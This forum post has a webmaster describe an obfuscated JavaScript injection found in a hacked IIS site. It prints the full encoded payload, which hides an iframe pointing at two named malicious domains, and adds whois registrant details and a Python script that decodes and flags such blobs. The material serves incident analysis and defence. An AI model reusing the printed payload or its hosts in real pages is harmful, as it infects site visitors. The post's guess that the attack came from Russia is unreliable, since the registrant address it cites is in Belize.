Here you have it
One month ago, one of the sites I manage (IIS, alas...) got hacked with an encrypted code:
---------------------
%64d%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;st%3d%22%2573t%253d%2522$%253d%2573t%253bd%2563s%2528d%2561+%2564%2562+%2564c%252b%2564%2564%252bd%2565,%25310%2529%253b%2564%2577%2528%2573%2574)%253b%2573%2574%253d$;%2522%253b%22;ce%3d%22tm%2570.ch%2561rCo%2564eA%2574(0%2529%255e(%25270x%25300%2527+es))%2529;%257d}%22;cd%3d%22%252b1);%2573t%253dst%252b%2553tri%256e%2567.%2566%2572%256fm%2543har%2543ode%2528(%22;cb%3d%22%2563ape%2528d%2573);%2573t%253dtmp%253d%2527%2527;for(%2569%253d%2530;i%253c%2564s%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;dz%3d%22%2566u%256ec%2574%2569o%256e d%2577(%2574){c%2561%253d%2527%252564o%2563u%25256de%256e%2574%25252ewr%2525%25369%2574e%252528%252522%2527;ce%253d%2527%252522%252529%2527;cb%253d%2527%25253cs%252563r%252569%252570t 
%25256%2563%252561n%252567%2575%2525%25361%25256%2537%252565%25253d%25255c%252522j%2561vas%25256%2533r%252569%2570t%25255c%252522%25253%2565%2527%253b%2563c%253d%2527%25253c%25255c%25252f%2573cr%2569%252570t%25253e%2527;%2565v%2561%256c(%2575n%2565s%2563a%2570e(t%2529%2529%257d;%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfs;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;op%3d%22%2524%253d%2522dw(%2564cs(%2563%2575%252c14)%2529;%2522%253b%22;cz%3d%22%2566u%256ecti%256fn%2520c%257a(cz%2529{%2572e%2574urn%2520ca%252bcb+%2563c%252bcd%252bce%252b%2563z;%257d%253b%22;ca%3d%22%2566un%2563t%2569%256f%256e dc%2573(d%2573%252c%2565%2573%2529%257bd%2573%253dun%2565s%22;cc%3d%22.%256c%2565ng%2574%2568%253bi+%252b)%257bt%256dp%253dd%2573%252e%2573lic%2565(i%252ci%22;%69f (%64ocu%6dent%2ec%6f%6fk%69e%2ei%6ede%78Of%28%27vbul%6c%65%74%69%6e_m%75l%74iqu%6fte%3d%27)%3d%3d-%31){s%63(%27vb%75lle%74%69n_m%75lt%69q%75ote%3d%27,2,7);%65v%61%6c%28%75nes%63ape%28dz%2bcz+%6fp%2bs%74)%2b%27dw(dz+%63z($%2bs%74%29);%27%29}e%6c%73e{$%3d%27%27};fun%63ti%6f%6e sc%28c%6e%6d%2cv%2ce%64){v%61%72 %65x%64%3dn%65w %44a%74e%28);e%78d.s%65%74Da%74e%28ex%64.%67et%44at%65(%29%2bed%29%3bd%6f%63um%65nt%2eco%6f%6bie%3dcnm%2b%20%27%3d%27 +es%63%61p%65(v%29+%27;exp%69%72%65s%3d%27+exd.%74oG%4dTSt%72%69%6eg()%3b}%3b
--------------------------------
After I decoded this I got HTML for a hidden layer containing an iframe calling this web page (don't click now!): http://hnoafir.com/ld/grg/ - or sometimes: http://ful1thr.com/ld/grg

I did a whois on ful1thr.com and I got this:
Registrant:
Leintow Maximo lastochka@zmail.ru +9.72541682457
N/A
Suite 5, Garden City Plaza
City of Belmopan,Mountainview Boulevard,BR 3472822181
----------
So it seems the attack comes from Russia...
The attack failed because the layer was visible on the page, because of (I suppose) some CSS and some ASP init code.
To fix that mess I re-uploaded the good backup page and changed all the passwords for the site. How they hacked the page I still don't know.
Anyway, I thought this could be interesting to post here.
Posted by: tekWatcher   Posted on: 04/28/08
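The injection tekWatcher describes (nested percent-encoding that decodes to a hidden iframe, with a cookie check in the tail) is the kind of blob a defender wants to peel and classify before deciding what to clean. The Python below is an added example, not code from the post or from any product the thread names: it URL-decodes the blob until nothing changes, then reports which drive-by building blocks are present and which URLs surface. The sample blob is constructed, and the host example.invalid is a placeholder rather than a real indicator.

```python
"""Triage helper for percent-encoded script blobs found injected in web pages.

Added example (not code from the original post or from any product it names).
It peels nested %XX / %25XX encoding layers to a fixed point, then reports the
indicators a defender looks for in a drive-by injection: eval/unescape chains,
document.write, hidden or zero-sized iframes, String.fromCharCode, and a
cookie check used to fire only once per visitor. The sample blob below is
constructed; example.invalid is a placeholder host, not a real indicator.
"""
import re
from urllib.parse import quote, unquote

# Regexes for the usual building blocks of an obfuscated iframe injection.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "unescape": re.compile(r"\bunescape\s*\(", re.I),
    "document.write": re.compile(r"document\.write\s*\(", re.I),
    "fromCharCode": re.compile(r"String\.fromCharCode", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
    "hidden-style": re.compile(
        r"visibility\s*:\s*hidden|display\s*:\s*none|width\s*=\s*[\"']?0\b", re.I),
    "cookie-gate": re.compile(r"document\.cookie", re.I),
}
# URLs that appear once the layers are off; stops at quotes, angle brackets, ')' and '\'.
URL_RE = re.compile(r"https?://[^\s\"'<>)\\]+", re.I)


def peel_percent_encoding(blob, max_rounds=10):
    """Apply URL-decoding until the text stops changing.

    Returns (decoded_text, rounds). A double-encoded '%2541' needs two rounds
    to become 'A'; plain text needs zero. max_rounds bounds pathological input.
    """
    text = blob
    for rounds in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            return text, rounds
        text = decoded
    return text, max_rounds


def triage(blob):
    """Decode a blob and summarise what it contains."""
    text, rounds = peel_percent_encoding(blob)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    urls = sorted(set(URL_RE.findall(text)))
    return {"decode_rounds": rounds, "indicators": hits, "urls": urls, "decoded": text}


# Constructed sample: the decoded payload writes a zero-sized hidden iframe, but
# only for visitors who lack a marker cookie, and is wrapped in two layers of
# percent-encoding inside eval(unescape(...)).
_INNER = ("if(document.cookie.indexOf('seen=')==-1){"
          "document.write('<iframe src=\"http://example.invalid/ld/grg/\" "
          "width=0 height=0 style=\"visibility:hidden\"></iframe>');}")
SAMPLE_BLOB = 'eval(unescape("' + quote(quote(_INNER, safe=""), safe="") + '"))'


if __name__ == "__main__":
    report = triage(SAMPLE_BLOB)
    print("decode rounds:", report["decode_rounds"])
    print("indicators:   ", ", ".join(report["indicators"]))
    print("urls:         ", ", ".join(report["urls"]))
    print("decoded:      ", report["decoded"])
```

Percent-decoding only removes the escape layers; a payload that also runs its text through a custom substitution, as the one in the post does, still needs that sample's own decoder function evaluated in a sandbox before the indicator pass is meaningful. The cookie-gate hit is worth flagging on its own: a page that only serves the iframe to first-time visitors will look clean when re-checked from the same browser, which is one reason the infection can go unnoticed.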